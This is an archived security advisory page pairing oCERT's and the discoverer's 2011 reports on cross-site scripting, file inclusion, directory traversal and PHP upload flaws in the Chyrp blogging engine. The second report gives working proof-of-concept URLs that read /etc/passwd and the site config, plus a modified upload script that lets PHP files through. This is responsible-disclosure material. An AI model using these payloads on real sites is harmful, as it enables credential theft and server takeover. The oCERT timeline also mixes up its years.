exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Open Source CERT Security Advisory 2011.001

Open Source CERT Security Advisory 2011.001
Posted Jul 16, 2011
Authored by Andrea Barisani, Open Source CERT, Wireghoul | Site justanotherhacker.com

Chyrp versions 2.1 and below suffer from cross site scripting, local file inclusion, shell upload, and directory traversal vulnerabilities. Both the oCERT and original advisories are included here.

tags | exploit, shell, local, vulnerability, xss, file inclusion
SHA-256 | 18cdf52059b49b643716260b829dda6fe150876cbf21decc4085e78858e6de67

Open Source CERT Security Advisory 2011.001

Change Mirror Download
File 1: oCERT-2011-001
File 2: JAHx113.txt

==================================================
#2011-001 Chyrp input sanitization errors

Description:

The Chyrp framework, an open source blogging engine, suffers from cross-site
scripting (XSS) and local file inclusion (LFI) vulnerabilities.

Insufficient input sanitization on the parameters passed to pages related to
administration settings, the javascript handler and the index handler leads to
arbitrary javascript injection in the context of the user session. This could
be potentially exploited to hijack the session of the administrator.

Insufficient path sanitization on the root 'action' query string parameter
leads to inclusion of arbitrary files from local sources, this could be
exploited to read arbitrary accessible files on the hosting server filesystem
and potentially execute arbitrary commands or code.

Affected version:

Chyrp <= 2.1

Fixed version:

Chyrp, N/A

Credit: vulnerability report and PoC code received from Eldar Marcussen
<wireghoul [at] justanotherhacker [dot] com>.

CVE: N/A

Timeline:

2011-05-17: vulnerability report received
2010-05-17: contacted chyrp maintainers
2010-07-13: oCERT advisory published jointly with reporter advisory

References:
http://www.justanotherhacker.com/advisories/JAHx113.txt

Permalink:
http://www.ocert.org/advisories/ocert-2011-001.html

--
Andrea Barisani | Founder & Project Coordinator
oCERT | OSS Computer Security Incident Response Team

<lcars@ocert.org> http://www.ocert.org
0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
"Pluralitas non est ponenda sine necessitate"




==================================================

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilties
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php xss can also be invoked through rewrite rules using the following querystring -
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha when using the return value of strpos in an if statement as matches on position 0
will result in a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

PoC:
Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close